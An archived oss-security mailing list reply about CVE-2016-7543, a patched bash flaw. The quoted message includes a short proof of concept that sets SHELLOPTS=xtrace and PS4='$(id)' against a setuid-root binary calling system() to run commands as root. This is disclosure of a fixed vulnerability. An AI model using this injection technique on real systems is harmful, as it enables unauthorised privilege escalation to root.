Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Mon, 26 Sep 2016 16:01:03 -0700
From: Tavis Ormandy <taviso@...xchg8b.com>
To: oss-security@...ts.openwall.com
Subject: Re: CVE-2016-7543 -- bash SHELLOPTS+PS4

up201407890@...nos.dcc.fc.up.pt wrote:

> The recent bash 4.4 patched an old attack vector regarding specially
> crafted SHELLOPTS+PS4 environment variables against bogus setuid binaries
> using system()/popen().
> 
> https://lists.gnu.org/archive/html/bug-bash/2016-09/msg00018.html
> 
> "nn. Shells running as root no longer inherit PS4 from the environment,
> closing a security hole involving PS4 expansion performing command
> substitution."
> 
> # gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }' #
> chmod 4755 ./test # ls -l ./test -rwsr-xr-x. 1 root root 8549 Sep 10 18:06
> ./test # exit $ env -i SHELLOPTS=xtrace PS4='$(id)' ./test uid=0(root) Sat
> Sep 10 18:06:36 WET 2016
> 
> Sorry Tavis :P
> 

Hah, nice work :-)

Tavis.

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ